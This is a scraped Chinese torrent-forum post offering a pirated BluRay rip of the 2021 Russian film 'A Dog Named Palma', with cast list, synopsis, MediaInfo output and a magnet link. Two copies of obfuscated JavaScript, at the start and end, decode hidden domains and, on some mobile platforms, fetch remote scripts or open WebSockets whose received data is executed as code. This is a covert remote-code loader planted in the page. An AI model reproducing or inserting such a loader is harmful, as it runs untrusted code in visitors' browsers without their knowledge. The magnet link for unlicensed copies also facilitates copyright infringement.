忠犬帕尔玛[中文字幕].Ein.Hund.namens.Palma.2021.1080p.BluRay.DTS-HD.MA.5.1.2Audio.x265-10bit 11.04GB

版主小s 29天前 134

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 忠犬帕尔玛 / Palma / A Dog Named Palma

◎片 名 Пальма

◎年 代 2021

◎产 地 俄罗斯

◎类 别 剧情 / 家庭

◎语 言 俄语

◎上映日期 2021-03-18(俄罗斯)

◎IMDb链接 https://www.imdb.com/title/tt8396480/

◎豆瓣评分 7.9/10 (2022人评价)

◎豆瓣链接 https://movie.douban.com/subject/35384201/

◎片 长 110分钟

◎导 演 亚历山大·多莫加罗夫 Aleksandr Domogarov (id:1366575)

亚历山大·多莫加罗夫 Aleksandr Domogarov (id:1010009)

◎编 剧 亚历山大·多莫加罗夫 Aleksandr Domogarov (id:1366575)

亚历山大·多莫加罗夫 Aleksandr Domogarov (id:1010009)

◎演 员 维克多·多勃朗拉沃夫 Viktor Dobronravov (id:1410807)

瓦莱莉娅·格纳季耶夫娜 Valeriya Fedorovich (id:1363340)

弗拉基米尔·伊利因 Vladimir Ilin (id:1042156)

彦·萨普尼克 Yan Tsapnik (id:1384011)

帕维尔·迈科夫 Pavel Maykov (id:1192178)

叶夫根尼娅·德米特里娃 Evgeniya Dmitrieva (id:1386916)

伊格·克里普诺夫 Igor Khripunov (id:1396768)

Vladimir Simonov Vladimir Simonov (id:1020231)

米凯尔·德扎尼比肯 Mikael Dzhanibekyan (id:1425580)

◎标 签 狗 / 动物 / 俄罗斯 / 感人 / 剧情 / 2021 / 2021观影 / 欧美

◎简 介

这部电影的灵感来自一个令人难以置信的故事,该故事讲述的是一只名叫Palm的牧羊犬,主人无意中把它留在机场。 她与九岁的尼古拉斯(Nicholas)成为朋友,尼古拉斯(Nicholas)的母亲去世,留下了一个他鲜为人知的父亲-一位飞行员在机场找到了那只狗。 这是一个奇妙的冒险,真实的友谊和无条件的爱情的故事。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 34248225844025670732199672690916553314 (0x19C3F7E71083966AC9DDCF84471D7262)

  4. Complete name : Ein.Hund.namen[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 11.0 GiB

  8. Duration : 1 h 50 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 14.3 Mb/s

  11. Movie name : Ein Hund namens Palma 2021 1080p BluRay DTS-HD MA 5.1 2Audio [email protected]

  12. Encoded date : UTC 2021-11-01 04:54:03

  13. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 50 min

  22. Bit rate : 6 319 kb/s

  23. Width : 1 920 pixels

  24. Height : 804 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.171

  32. Stream size : 4.87 GiB (44%)

  33. Title : [email protected]

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No


  37. Audio #1

  38. ID : 2

  39. Format : DTS XLL

  40. Format/Info : Digital Theater Systems

  41. Commercial name : DTS-HD Master Audio

  42. Codec ID : A_DTS

  43. Duration : 1 h 50 min

  44. Bit rate mode : Variable

  45. Bit rate : 4 012 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossless

  52. Stream size : 3.09 GiB (28%)

  53. Title : Russian

  54. Language : Russian

  55. Default : Yes

  56. Forced : No


  57. Audio #2

  58. ID : 3

  59. Format : DTS XLL

  60. Format/Info : Digital Theater Systems

  61. Commercial name : DTS-HD Master Audio

  62. Codec ID : A_DTS

  63. Duration : 1 h 50 min

  64. Bit rate mode : Variable

  65. Bit rate : 3 976 kb/s

  66. Channel(s) : 6 channels

  67. Channel layout : C L R Ls Rs LFE

  68. Sampling rate : 48.0 kHz

  69. Frame rate : 93.750 FPS (512 SPF)

  70. Bit depth : 24 bits

  71. Compression mode : Lossless

  72. Stream size : 3.06 GiB (28%)

  73. Title : German

  74. Language : German

  75. Default : No

  76. Forced : No


  77. Text #1

  78. ID : 4

  79. Format : PGS

  80. Muxing mode : zlib

  81. Codec ID : S_HDMV/PGS

  82. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration : 1 h 47 min

  84. Bit rate : 28.2 kb/s

  85. Count of elements : 2447

  86. Stream size : 21.6 MiB (0%)

  87. Title : CHS

  88. Language : Chinese

  89. Default : Yes

  90. Forced : No


  91. Text #2

  92. ID : 5

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 1 h 47 min

  98. Bit rate : 29.9 kb/s

  99. Count of elements : 2447

  100. Stream size : 22.9 MiB (0%)

  101. Title : CHT

  102. Language : Chinese

  103. Default : No

  104. Forced : No


  105. Menu

  106. 00:00:00.000 : en:Chapter 01

  107. 00:12:22.750 : en:Chapter 02

  108. 00:18:23.958 : en:Chapter 03

  109. 00:24:54.208 : en:Chapter 04

  110. 00:33:14.000 : en:Chapter 05

  111. 00:40:45.208 : en:Chapter 06

  112. 00:48:23.708 : en:Chapter 07

  113. 00:54:40.208 : en:Chapter 08

  114. 01:01:25.250 : en:Chapter 09

  115. 01:07:00.667 : en:Chapter 10

  116. 01:12:34.625 : en:Chapter 11

  117. 01:16:57.250 : en:Chapter 12

  118. 01:24:45.125 : en:Chapter 13

  119. 01:29:35.208 : en:Chapter 14

  120. 01:35:58.125 : en:Chapter 15

  121. 01:45:53.292 : en:Chapter 16




复制代码


TAGS 剧情 家庭

磁力链:
  • magnet:?xt=urn:btih:17386B10D4D7185183C5DBE1E95E8C534FFE77BE

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};